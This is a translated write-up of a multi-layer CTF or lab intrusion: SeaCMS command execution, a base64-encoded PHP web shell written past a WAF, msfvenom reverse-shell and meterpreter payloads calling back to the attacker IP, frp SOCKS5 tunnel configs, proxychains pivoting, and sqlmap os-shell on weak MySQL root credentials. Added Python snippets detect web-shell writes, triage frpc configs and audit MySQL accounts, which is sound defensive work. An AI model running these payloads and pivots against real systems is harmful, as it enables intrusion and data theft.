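I've been really busy lately. The boss not only makes us work overtime but doesn't pay for it, and keeps bragging that 996 is a blessing. I've decided to change jobs; I think joining a red team for HVV exercises later on would be fine too. Either pentesting or security services, either way I really don't want to waste my life at this kind of garbage company... Recently I did an ICS CTF, a Baidu security competition, and this one. This one could only be done from Kali, which is quite limiting, and I prepared my environment badly... Only 2 hints were given: 1. entry is through 10.2.2.97; 2. it is a three-layer network with 8 flags, and the DC has to be taken at the end. The flags are actually secondary; the DC is the main thing. The nasty part is that this network restarts itself and has defensive capability: every so often it refreshes and all the backdoors are gone... So AV evasion, dealing with the defenses, and avoiding detection took a lot of effort...
I. External foothold
First, connect in with openconnect
Local IP assigned: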
Password:
POST https://183.129.189.62:4434/auth
得到了 CONNECT 响应:HTTP/1.1 200 CONNECTED
CSTP 已连接。DPD 90,持久连接(Keepalive)32400
Connected as 10.2.1.83, using SSL, with DTLS in progress
DTLS 握手失败:资源临时不可用,请重试。
An nmap scan showed that 10.2.2.97 has 22 and 80 open. hydra could not brute-force 22; visiting 80 showed it is SeaCMS (海洋CMS)
whatweb 10.2.2.97
http://10.2.2.97 [200 OK] Apache[2.4.7], Bootstrap[3.3.5], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.7 (Ubuntu)], IP[10.2.2.97], JQuery[1.11.3], PHP[5.5.9-1ubuntu4.25], Script, Title[海洋CMS], X-Powered-By[PHP/5.5.9-1ubuntu4.25], X-UA-Compatible[IE=edge]
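I looked up many SeaCMS exploits; this article is good:
"Seacms漏洞" (Seacms vulnerabilities), Grey's blog, CSDN
Probing turned up something odd. I suspect a reverse proxy is in place, because ifconfig reports the IP as 10.20.20.31 rather than 10.2.2.97
Got one flag:
I started writing a shell and found that system('echo (one-line web shell) > shell.PHP') apparently could not write it. Then I thought of using nc or wget, sc to download the local msf payload, but that did not seem to work either, so writing a shell was the only option. According to my mentor (大表哥), version 6.53 limits the length of the RCE, and these two methods are generally used to write a shell:
Honestly, I would never have come up with the PoC in the image below
Fancy divider line ----------------------------------------
Because the network changed, my local IP became 10.2.0.19 and the first target became 10.2.2.16
Here I used the method from the first image to write the shell, and found that what had worked for my mentor did not work for me... I really am still a noob, so I'll write it with echo (o(╥﹏╥)o). The shell was written as follows:
Connecting with AntSword to get the shell: the returned data was empty!!!!! I was stunned; the one-line web shell had clearly been written! After checking, I found that the post function was being filtered! There is actually a damn WAF here! What to do? Bypass it... Reference:
"渗透tip-----命令执行写入webshell" (Pentest tip: writing a webshell through command execution), Shadown-PQ, cnblogs (博客园)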
echo "PD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/Pg==" | base64 -d >2.PHP
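From the defender's side, the step above shows why a keyword filter on the request is not enough: the content only becomes readable after decoding. The following added example (not part of the original post) inspects process command lines, decodes any base64 tokens and checks both the decoded content and the redirect target. It assumes command lines are available from process-execution telemetry; the function names are hypothetical.

```python
import base64
import binascii
import re

# Base64-looking runs long enough to carry a script fragment.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
# Request-controlled data handed straight to a PHP code or command executor.
PHP_EXEC = re.compile(
    r"\b(eval|assert|system|passthru|shell_exec)\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)",
    re.IGNORECASE,
)
# Shell redirection into a file type the web server may execute.
SCRIPT_REDIRECT = re.compile(r">\s*\S+\.(php\d?|phtml)(\s|$)", re.IGNORECASE)


def decoded_payloads(cmdline):
    """Yield the text recovered from each decodable base64 token."""
    for token in B64_TOKEN.findall(cmdline):
        try:
            raw = base64.b64decode(token, validate=True)
        except (binascii.Error, ValueError):
            continue
        yield raw.decode("utf-8", errors="replace")


def inspect_command(cmdline):
    """Return the reasons a command line looks like a web shell being written."""
    reasons = []
    if SCRIPT_REDIRECT.search(cmdline):
        reasons.append("redirect-to-script")
    if any(PHP_EXEC.search(text) for text in decoded_payloads(cmdline)):
        reasons.append("decoded-php-exec")
    return reasons


# Sample telemetry: the first line is the command from this page, the second
# is a constructed benign use of the same base64 pipeline.
BENIGN = base64.b64encode(b"nightly backup finished without errors").decode()
SAMPLES = [
    'echo "PD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/Pg==" | base64 -d >2.PHP',
    f'echo "{BENIGN}" | base64 -d > /var/tmp/backup-status.txt',
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(inspect_command(line) or ["clean"], line)
```

A shell spawned by the web server's own user that writes into the web root is worth alerting on by itself; the decoded-content check adds confidence when both reasons fire.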
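II. Lateral movement in the first internal layer, 10.10.20
Basic information gathering
The current IP is 10.10.20.31 (the network changed, so the IP changed; this time I am sure it is a reverse proxy. 3306 is also open locally, but nmap from outside cannot see it, possibly because of an allowlist or the WAF. Looking at the processes with ps, there seems to be no antivirus...)
Get in with an msf reverse shell (with AV evasion if conditions allow)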
msfvenom -p linux/x64/shell/reverse_tcp lhost=10.2.0.19 lport=4444 -f elf -o shell
use exploit/multi/handler
The first generated shell did not give an interactive meterpreter, so I switched payloads and continued:
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=10.2.0.19 LPORT=4445 -f elf > shell2.elf
Active sessions
===============
No active sessions.
msf5 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 10.2.0.19
lhost => 10.2.0.19
msf5 exploit(multi/handler) > set lport 4445
lport => 4445
msf5 exploit(multi/handler) > run
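I spawned the session over to CS, but then suddenly realised that getting a Linux host to come online in CS is rather troublesome... frpc has an obvious traffic signature, so I thought of scanning directly with an AV-evading fscan...
Great, at this point there was again no output echoed, so save it to a txt file:
fscan -h 10.10.20.0/24 -o 1.txt
Then, because the activity was too noisy (or perhaps for network reasons), the connection dropped. I thought, surely I haven't been discovered!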
10.10.20.1:80 open
10.10.20.1:22 open
10.10.20.31:80 open
10.10.20.166:3306 open
10.10.20.100:80 open
10.10.20.231:3306 open
10.10.20.88:8009 open
10.10.20.88:8080 open
[+] mysql:10.10.20.166:3306:root 123456
[+] mysql:10.10.20.231:3306:root 123456
[*] WebTitle:http://10.10.20.1 code:200 len:9 title:海洋CMS
[*] WebTitle:http://10.10.20.31 code:200 len:9 title:海洋CMS
[*] WebTitle:http://10.10.20.100 code:200 len:12 title:后台系统
[*] WebTitle:http://10.10.20.88:8080 code:200 len:20 title:Apache Tomcat/8.0.43
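Two machines turned out to be interesting:
[+] mysql:10.10.20.166:3306:root 123456
[+] mysql:10.10.20.231:3306:root 123456
They cannot be reached directly, so at this point a proxy is the only option...
The two frp configuration files are as follows:
frps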
[common]
bind_addr = 0.0.0.0
bind_port = 7000
dashboard_addr = 0.0.0.0
dashboard_port = 7001
dashboard_user = root
dashboard_pwd = 123456
token = 00253c8fcf9ae01
frpc
[common]
server_addr = 10.2.0.19
server_port = 7000
token = 00253c8fcf9ae01
pool_count = 5
health_check_type = tcp
health_check_interval_s = 100
[test]
remote_port = 12345
plugin = socks5
use_encryption = true
use_compression = true
plugin_user = admin
plugin_passwd = 123456
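For incident response, a client file like the one above is a useful artifact when it is recovered from a compromised host: it names the controller endpoint and the ports to look for in firewall logs. The following added example (not part of the original post) parses such a file and summarises it. It assumes the legacy INI format shown here; `triage_frpc` is a hypothetical name.

```python
import configparser


def triage_frpc(ini_text):
    """Summarise a recovered legacy-INI frpc config; None if it is not one."""
    cp = configparser.ConfigParser(interpolation=None)
    try:
        cp.read_string(ini_text)
    except configparser.Error:
        return None
    if not cp.has_option("common", "server_addr"):
        return None  # frps and unrelated INI files have no server_addr
    common = cp["common"]
    proxies = []
    for name in cp.sections():
        if name == "common":
            continue
        sec = cp[name]
        proxies.append({
            "name": name,
            "plugin": sec.get("plugin"),
            "remote_port": sec.getint("remote_port", fallback=None),
            "encrypted": sec.getboolean("use_encryption", fallback=False),
        })
    return {
        # 7000 is frp's default server port when the key is absent.
        "controller": (common["server_addr"], common.getint("server_port", fallback=7000)),
        "proxies": proxies,
        "socks_pivot": any(p["plugin"] == "socks5" for p in proxies),
    }


# The frpc settings from this page that the triage reads, as sample input.
FRPC_SAMPLE = """
[common]
server_addr = 10.2.0.19
server_port = 7000
[test]
remote_port = 12345
plugin = socks5
use_encryption = true
"""

if __name__ == "__main__":
    print(triage_frpc(FRPC_SAMPLE))
```

When `encrypted` is true, payload inspection of the tunnel will not help, so hunting has to rely on connection metadata: a long-lived outbound session from a server to the controller address and port.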
proxychains settings
Verify with nmap that the proxy works: it does, 3306 is open
cobaltstrike-4.3$ proxychains nmap 10.10.20.166
ProxyChains-3.1 (http://proxychains.sf.net)
Starting Nmap 7.80 ( https://nmap.org ) at 2021-11-04 18:45 CST
|S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:80-<--timeout
|S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:587-<--timeout
|S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:8080-<--timeout
|S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:143-<--timeout
|S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:53-<--timeout
|S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:554-<--timeout
|S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:1720-<--timeout
|S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:3306-<><>-OK
|S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:445-<--timeout
|S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:113-<--timeout
|S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.166:995-<--timeout
Log in to MySQL on 10.10.20.231 through the proxy without leaving traces: mysql -h localhost -u root -p
Found root's password hash; crack it:
MySQL [mysql]> select * from user;
+--------------+------+-------------------------------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+--------+-----------------------+
| Host | User | Password | Select_priv | Insert_priv | Update_priv | Delete_priv | Create_priv | Drop_priv | Reload_priv | Shutdown_priv | Process_priv | File_priv | Grant_priv | References_priv | Index_priv | Alter_priv | Show_db_priv | Super_priv | Create_tmp_table_priv | Lock_tables_priv | Execute_priv | Repl_slave_priv | Repl_client_priv | Create_view_priv | Show_view_priv | Create_routine_priv | Alter_routine_priv | Create_user_priv | Event_priv | Trigger_priv | Create_tablespace_priv | ssl_type | ssl_cipher | x509_issuer | x509_subject | max_questions | max_updates | max_connections | max_user_connections | plugin | authentication_string |
+--------------+------+-------------------------------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+--------+-----------------------+
| localhost | root | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | | | | | 0 | 0 | 0 | 0 | | |
| 9d231610406a | root | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | | | | | 0 | 0 | 0 | 0 | | |
| 127.0.0.1 | root | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | | | | | 0 | 0 | 0 | 0 | | |
| ::1 | root | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | | | | | 0 | 0 | 0 | 0 | | |
| localhost | | | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | | | | | 0 | 0 | 0 | 0 | | NULL |
| 9d231610406a | | | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | N | | | | | 0 | 0 | 0 | 0 | | NULL |
| % | root | *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9 | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | Y | | | | | 0 | 0 | 0 | 0 | | NULL |
+--------------+------+-------------------------------------------+-------------+-------------+-------------+-------------+-------------+-----------+-------------+---------------+--------------+-----------+------------+-----------------+------------+------------+--------------+------------+-----------------------+------------------+--------------+-----------------+------------------+------------------+----------------+---------------------+--------------------+------------------+------------+--------------+------------------------+----------+------------+-------------+--------------+---------------+-------------+-----------------+----------------------+--------+-----------------------+
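The table above is also what a database administrator's account audit should catch before anyone else reads it. The following added example (not part of the original post) checks the Host, User and Password columns for anonymous accounts, empty passwords, root reachable from any host, and hashes that match a deny-list, using the mysql_native_password format of the hashes shown. The deny-list is constructed and the function names are hypothetical.

```python
import hashlib


def native_password_hash(password):
    """mysql_native_password: '*' + upper-case hex of SHA1(SHA1(password))."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


# Constructed deny-list; a real audit would load the organisation's own list.
DENY_LIST = ["root", "admin", "password", "123456", "mysql"]
WEAK_HASHES = {native_password_hash(p) for p in DENY_LIST}


def audit_accounts(rows):
    """rows: (host, user, password_hash) from mysql.user. Returns findings."""
    findings = []
    for host, user, pw_hash in rows:
        account = f"'{user}'@'{host}'"
        if user == "":
            findings.append((account, "anonymous account"))
        if pw_hash == "":
            findings.append((account, "empty password"))
        elif pw_hash in WEAK_HASHES:
            findings.append((account, "password on deny-list"))
        if host == "%" and user == "root":
            findings.append((account, "root reachable from any host"))
    return findings


# The Host, User and Password columns of the seven rows shown above.
H = "*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9"
ROWS = [
    ("localhost", "root", H), ("9d231610406a", "root", H),
    ("127.0.0.1", "root", H), ("::1", "root", H),
    ("localhost", "", ""), ("9d231610406a", "", ""),
    ("%", "root", H),
]

if __name__ == "__main__":
    for account, issue in audit_accounts(ROWS):
        print(f"{account:28} {issue}")
```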
How to get a shell with sqlmap -d: "[猥琐姿势]利用MySQL的root账号从而快速GetShell" ([Sneaky trick] using the MySQL root account to quickly get a shell), Zhihu
proxychains sqlmap -d "mysql://root:123456@10.10.20.231:3306/mysql" -f
[*] starting @ 19:12:24 /2021-11-04/
|S-chain|-<>-127.0.0.1:12345-<><>-10.10.20.231:3306-<><>-OK
[19:12:30] [INFO] connection to MySQL server '10.10.20.231:3306' established
[19:12:30] [INFO] testing MySQL
[19:12:30] [INFO] resumed: [['1']]...
[19:12:30] [INFO] confirming MySQL
[19:12:30] [INFO] resumed: [['1']]...
[19:12:31] [INFO] the back-end DBMS is MySQL
[19:12:31] [INFO] actively fingerprinting MySQL
[19:12:32] [INFO] executing MySQL comment injection fingerprint
back-end DBMS: active fingerprint: MySQL >= 5.5
comment injection fingerprint: MySQL 5.5.23
[19:12:47] [INFO] connection to MySQL server '10.10.20.231:3306' closed
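MySQL version 5.5.23. Once in, I found the privileges were pitifully low, just the mysql user's privileges. I wondered whether I could escalate with UDF or MOF, but there was a flag8.txt right there under /tmp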
---
os-shell> ls /tmp
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
---
flag8.txt
mysql.sock
---
os-shell> cat /tmp/flag8.txt
do you want to retrieve the command standard output? [Y/n/a] y
command standard output: '14326d7730ff9838e1e5e2a778028356'
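"Mysql-UDF提权" (MySQL UDF privilege escalation), 告白's blog, CSDN
The weak credential is tomcat, and the password is TOMCAT123. I really couldn't be bothered to escalate manually, so my mentor just handed me the password
Now comes the most annoying part!
I could not get Firefox to go through proxychains! Everything else, curl and nmap, worked, just not Firefox. Even with the browser manually set to a SOCKS5 proxy on port 12345, I could not reach Tomcat at 10.10.20.88:8080. So how was I supposed to get a shell on 10.10.20.88?? Ridiculous, utterly ridiculous... exactly the same steps and environment... sigh...
III. Second internal layer: the core zone
After taking Tomcat, I set up a second-level proxy and, once in, scanned with nmap. This time it was comparatively less nasty, just the usual approach to attacking internal hosts. For various reasons I cannot write up the last internal layer, so I'll leave it here for now. To sum up the path:
kali -------> cms (DMZ) ------> MySQL (internal network 1, password found) ----> tomcat (internal network 1) -------> winserver (internal network 2, final answer obtained)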